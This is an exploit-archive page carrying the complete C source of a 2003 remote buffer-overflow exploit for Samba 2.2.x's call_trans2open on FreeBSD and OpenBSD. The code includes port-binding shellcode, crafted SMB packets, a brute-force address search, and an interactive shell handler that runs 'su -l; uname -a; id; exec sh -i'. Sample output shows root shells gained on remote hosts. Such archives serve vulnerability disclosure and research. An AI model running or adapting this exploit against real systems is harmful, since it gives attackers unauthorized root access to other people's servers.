exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

0x82-Remote.54AAb4.xpl.c

0x82-Remote.54AAb4.xpl.c
Posted Apr 18, 2003
Authored by Xpl017Elz | Site x82.inetcop.org

FreeBSD and OpenBSD remote Samba v2.2.x call_trans2open i386 buffer overflow exploit. Tested against OpenBSD 3.0 and FreeBSD 4.6.2-RELEASE with Samba v2.2.x. Includes support for target brute forcing. Information about the vulnerability is available here.

tags | exploit, remote, overflow
systems | freebsd, openbsd
SHA-256 | f677c9d6fb78104c365cb38722fea0540f263fc2adf56d38ded0fbb35c2f2573

0x82-Remote.54AAb4.xpl.c

Change Mirror Download
/*
**
** [+] Title: Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** 11/Apr/2003
** [+] Exploit code: 0x82-Remote.54AAb4.xpl.c
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** source/smbd/trans2.c:
**
** line:205 static int call_trans2open(connection_struct *conn, char *inbuf, char *outbuf, int bufsize,
** line:206 char **pparams, int total_params, char **ppdata, int total_data)
** line:207 {
** [...]
** line:219 char *pname;
** line:220 int16 namelen;
** [...]
** line:222 pstring fname; // source/include/smb.h:
** // line:162 #define PSTRING_LEN 1024
** // line:165 typedef char pstring[PSTRING_LEN];
** [...]
** line:250 namelen = strlen(pname)+1;
** line:251
** line:252 StrnCpy(fname,pname,namelen); // here.
**
** reply_trans2() function:
**
** line:3173 int reply_trans2(connection_struct *conn, char *inbuf,char *outbuf,int length,int bufsize)
** [...]
** line:3358 outsize = call_trans2open(conn, inbuf, outbuf, bufsize,
** line:3359 &params, total_params, &data, total_data);
** line:3360 END_PROFILE_NESTED(Trans2_open);
** line:3361 break;
**
** Visual point that change flowing of this program,
** happen after overwrited variables.
**
** Detailed information references digitaldefense's Advisory.
**
** http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
**
** Also, thank about eSDee's exploit that remind Samba application communication method.
** --
** Thank you.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>

struct os {
int num;
char *ost;
u_long shell;
};
struct os plat[]=
{
{
0,"FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x",
/*
v2.2.0 exploited successfully. (Brute-Force mode)
v2.2.1a exploited successfully. (Brute-Force mode)
v2.2.2 exploited successfully. (Brute-Force mode)
v2.2.3 exploited successfully. (Default mode)
v2.2.4 exploited successfully. (Default mode)
v2.2.5 exploited successfully. (Default mode)
v2.2.6 exploited successfully. (Default mode)
v2.2.7 exploited successfully. (Default mode)
v2.2.8 exploited successfully. (Default mode)
*/
0xbfbff482
},
{
1,"OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x",
/*
v2.2.0 exploited successfully. (Brute-Force mode)
v2.2.1a exploited successfully. (Brute-Force mode)
v2.2.2 exploited successfully. (Brute-Force mode)
v2.2.3 exploited successfully. (Default mode)
v2.2.4 exploited successfully. (Default mode)
v2.2.5 exploited successfully. (Default mode)
v2.2.6 exploited successfully. (Default mode)
v2.2.7 exploited successfully. (Default mode)
v2.2.8 exploited successfully. (Default mode)
*/
0xdfbfd482
},
{
2,NULL,0
}
};

char shellcode[]=
/* 86bytes portbinding shellcode by bighawk */
"\x31\xc9" // xor ecx, ecx
"\xf7\xe1" // mul ecx
"\x51" // push ecx
"\x41" // inc ecx
"\x51" // push ecx
"\x41" // inc ecx
"\x51" // push ecx
"\x51" // push ecx
"\xb0\x61" // mov al, 97
"\xcd\x80" // int 80h
"\x89\xc3" // mov ebx, eax
"\x52" // push edx
"\x66\x68\x27\x10" // push word 4135
"\x66\x51" // push cx
"\x89\xe6" // mov esi, esp
"\xb1\x10" // mov cl, 16
"\x51" // push ecx
"\x56" // push esi
"\x50" // push eax
"\x50" // push eax
"\xb0\x68" // mov al, 104
"\xcd\x80" // int 80h
"\x51" // push ecx
"\x53" // push ebx
"\x53" // push ebx
"\xb0\x6a" // mov al, 106
"\xcd\x80" // int 80h
"\x52" // push edx
"\x52" // push edx
"\x53" // push ebx
"\x53" // push ebx
"\xb0\x1e" // mov al, 30
"\xcd\x80" // int 80h
"\xb1\x03" // mov cl, 3
"\x89\xc3" // mov ebx, eax
"\xb0\x5a" // mov al, 90
"\x49" // dec ecx
"\x51" // push ecx
"\x53" // push ebx
"\x53" // push ebx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf5" // loop-10
"\x51" // push ecx
"\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
"\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x54" // push esp
"\x53" // push ebx
"\x53" // push ebx
"\xb0\x3b" // mov al, 59
"\xcd\x80"; // int 80h

#define BRUTE_AT (64)
#define SH_PORT (10000)
#define ATK_PORT (139)
#define DF_NOP (0x41)
#define __BUF_LEN (0x00000463)
#define __LEN_PAD (0x0000012c)

void banrl();
int re_connt(int sock,int type);
void usage(char *p_name);
int setsock(char *host,int port);
void send_recv_sh(int sock);
int __atk_code_send_recv(int sock,u_long shell);

int __atk_code_send_recv(int sock,u_long shell)
{
int eat_buf_set=0,atk_buf_pos=0;
char atk_buf[0x960+5];
char its_exploit_packet[]={
0x00,0x04,0x09,0x60,0xff,0x53,0x4d,0x42,
0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x64,0x00,0x00,0x00,0x00,0xd0,0x07,0x0c,
0x00,0xd0,0x07,0x0c,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,
0x07,0x43,0x00,0x0c,0x00,0x14,0x08,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,
0x00
};
char its_first_time_conn[]={
0x00,0x00,0x00,0x2e,0xff,0x53,0x4d,0x42,
0x73,0x00,0x00,0x00,0x00,0x08,0x01,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x64,0x00,0x01,0x00,0x00,0xff,0x00,0x00,
0x00,0x00,0x20,0x02,0x00,0x01,0x00,0x00,
0x00,0x00
};
char its_second_time_conn[]={
0x00,0x00,0x00,0x3c,0xff,0x53,0x4d,0x42,
0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x20,
0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x5c,0x5c,0x69,0x70,0x63,0x24,0x25,0x6e,
0x6f,0x62,0x6f,0x64,0x79,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x49,0x50,0x43,0x24
};
int first_packet_len=sizeof(its_first_time_conn);
int second_packet_len=sizeof(its_second_time_conn);

memset((char *)atk_buf,0,sizeof(atk_buf));
memcpy(atk_buf,its_first_time_conn,sizeof(its_first_time_conn));
send(sock,atk_buf,first_packet_len,0);
recv(sock,atk_buf,sizeof(atk_buf)-1,0);

memset((char *)atk_buf,0,sizeof(atk_buf));
memcpy(atk_buf,its_second_time_conn,sizeof(its_second_time_conn));
send(sock,atk_buf,second_packet_len,0);
recv(sock,atk_buf,sizeof(atk_buf)-1,0);

memset((char *)atk_buf,0,sizeof(atk_buf));
memcpy(atk_buf+atk_buf_pos,its_exploit_packet,sizeof(its_exploit_packet));
atk_buf_pos+=sizeof(its_exploit_packet);

memset(atk_buf+atk_buf_pos,DF_NOP,((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos));
atk_buf_pos+=((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos);

memcpy(atk_buf+atk_buf_pos,shellcode,strlen(shellcode));
atk_buf_pos+=strlen(shellcode);

memset(atk_buf+atk_buf_pos,DF_NOP,__LEN_PAD);
atk_buf_pos+=(__LEN_PAD);
#ifdef __DEBUG
sleep(10);
#endif
{
*(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp
atk_buf_pos+=4;
*(long *)&atk_buf[atk_buf_pos]=(shell);// retaddr;
atk_buf_pos+=4;
*(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp
atk_buf_pos+=4;
}
send(sock,atk_buf,sizeof(atk_buf)-1,0);
}

int main(int argc,char *argv[])
{
int sock,whtl,type=0,brute_f=0;
char tg_host[0x82]="localhost";
u_long shell=plat[type].shell;

(void)banrl();
if(argc<2)
{
(void)usage(argv[0]);
}

while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1)
{
extern char *optarg;
switch(whtl)
{
case 'H':
case 'h':
memset((char *)tg_host,0,sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;

case 'S':
case 's':
shell=strtoul(optarg,0,0);
break;

case 'T':
case 't':
if((type=atoi(optarg))>1)
{
(void)usage(argv[0]);
}
else shell=plat[type].shell;
break;

case 'I':
case 'i':
(void)usage(argv[0]);
break;

case 'B':
case 'b':
brute_f++;
break;

case '?':
fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}
if(brute_f)
{
fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT);
fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n");
fprintf(stdout," [*] Brute-Force mode:\n\n");
fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|");
fprintf(stdout,"\n |");

for(brute_f=0;brute_f<BRUTE_AT;brute_f++)
{
fflush(stdout);
fprintf(stdout,"=");

shell+=(0x100);
sock=(int)setsock(tg_host,ATK_PORT);

if((int)re_connt(sock,0)==-1)
{
while(!(brute_f>=BRUTE_AT-1))
{
fprintf(stdout,"=");
brute_f++;
}
fprintf(stdout,"|\n\n");
fprintf(stderr," [-] Connect Failed.\n\n");
exit(-1);
}

__atk_code_send_recv(sock,shell);
close(sock);
sleep(2);
sock=(int)setsock(tg_host,SH_PORT);

if((int)re_connt(sock,0)==-1)
{
continue;
}

while(!(brute_f>=BRUTE_AT-1))
{
fprintf(stdout,"=");
brute_f++;
}

fprintf(stdout,"|\n\n");
fprintf(stdout," [+] Shellcode address: %p\n",shell);
fprintf(stdout," [*] Brute-Force end !!\n\n");
fprintf(stdout," **\n ** Bind shellcode is port 10000.\n");
fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n");

(void)send_recv_sh(sock);
}

fprintf(stdout,"|\n\n **\n");
fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n");
fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT);
fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n");
fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n");
exit(-1);
}
else
{
fprintf(stdout," [0] Target: %s\n",plat[type].ost);
fprintf(stdout," [1] Set socket.\n");
sock=(int)setsock(tg_host,ATK_PORT);
(int)re_connt(sock,1);

fprintf(stdout," [2] Make shellcode & Send Packet.\n");
__atk_code_send_recv(sock,shell);
close(sock);

fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT);
sleep(2);

sock=(int)setsock(tg_host,SH_PORT);
(int)re_connt(sock,1);

fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT);
(void)send_recv_sh(sock);
}
}

int setsock(char *hostip,int port)
{
int sock;
struct hostent *he;
struct sockaddr_in x82;

if((he=gethostbyname(hostip))==NULL)
{
return(-1);
}

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
return(-1);
}

x82.sin_family=AF_INET;
x82.sin_port=htons(port);
x82.sin_addr=*((struct in_addr *)he->h_addr);
memset(&(x82.sin_zero),0,8);

if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-1)
{
return(-1);
}
return(sock);
}

int re_connt(int sock,int type)
{
if(sock==-1)
{
if(type)
{
fprintf(stderr," [-] Connect Failed.\n\n");
exit(-1);
}
else return(-1);
}
}

void send_recv_sh(int sock)
{
int pk;
struct timeval tm;
char *t_cmd="su -l\n";
char *n_cmd="uname -a;id;exec sh -i\n";
char rbuf[1024];
fd_set rset;
memset((char *)rbuf,0,sizeof(rbuf));
fprintf(stdout," [*] Executed shell successfully !\n");
fprintf(stdout," [*] Command: # su -l; uname -a; id; exec sh -i\n\n");
send(sock,t_cmd,strlen(t_cmd),0);
send(sock,n_cmd,strlen(n_cmd),0);

tm.tv_sec=10;
tm.tv_usec=0;

while(1)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);

select(sock+1,&rset,NULL,NULL,&tm);

if(FD_ISSET(sock,&rset))
{
pk=read(sock,rbuf,sizeof(rbuf)-1);
if(pk<=0)
{
fprintf(stdout," [*] Happy-Exploit\n\n");
close(sock);
exit(0);
}
rbuf[pk]=0;
fprintf(stdout,"%s",rbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
pk=read(STDIN_FILENO,rbuf,sizeof(rbuf)-1);
if(pk>0)
{
rbuf[pk]=0;
write(sock,rbuf,pk);
}
}
}
return;
}

void banrl()
{
fprintf(stdout,"\n Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD\n");
fprintf(stdout," by Xpl017Elz.\n\n");
}

void usage(char *p_name)
{
int r_s=0;
fprintf(stdout," Usage: %s -option [argument]\n",p_name);
fprintf(stdout,"\n\t-h - hostname. (default: localhost)\n");
fprintf(stdout,"\t-s - shellcode. (select target)\n");
fprintf(stdout,"\t-t - target number.\n");
fprintf(stdout,"\t-b - auto brute-force attack mode.\n");
fprintf(stdout,"\t-i - help information.\n\n");
fprintf(stdout," Select target number:\n\n");

for(;;)
{
if(plat[r_s].ost==NULL)
break;
else fprintf(stdout,"\t{%d} %s\n",plat[r_s].num,plat[r_s].ost);
r_s++;
}
fprintf(stdout,"\n Example> %s -hlocalhost -s 0x82828282\n\n",p_name);
exit(-1);
}

/*
**
** OpenBSD exploit:
** --
** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t1
**
** Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** by Xpl017Elz.
**
** [0] Target: OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x
** [1] Set socket.
** [2] Make shellcode & Send Packet.
** [3] Trying 61.37.xxx.xx:10000.
** [*] Connected to 61.37.xxx.xx:10000.
** [*] Executed shell successfully !
** [*] Command: # su -l; uname -a; id; exec sh -i
**
** tset: standard error: Operation not supported
** OpenBSD testsub 3.0 GENERIC#94 i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
** sh: No controlling tty (open /dev/tty: Device not configured)
** sh: Can't find tty file descriptor
** sh: warning: won't have full job control
** #
** --
**
** FreeBSD exploit:
** --
** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t0
**
** Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** by Xpl017Elz.
**
** [0] Target: FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x
** [1] Set socket.
** [2] Make shellcode & Send Packet.
** [3] Trying 61.37.xxx.xx:10000.
** [*] Connected to 61.37.xxx.xx:10000.
** [*] Executed shell successfully !
** [*] Command: # su -l; uname -a; id; exec sh -i
**
** Warning: no access to tty (Bad file descriptor).
** Thus no job control in this shell.
** FreeBSD localhost 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #0: Wed Aug 14 21:23:26 GMT 2002
** murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
** sh: can't access tty; job control turned off
** #
** --
**
*/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close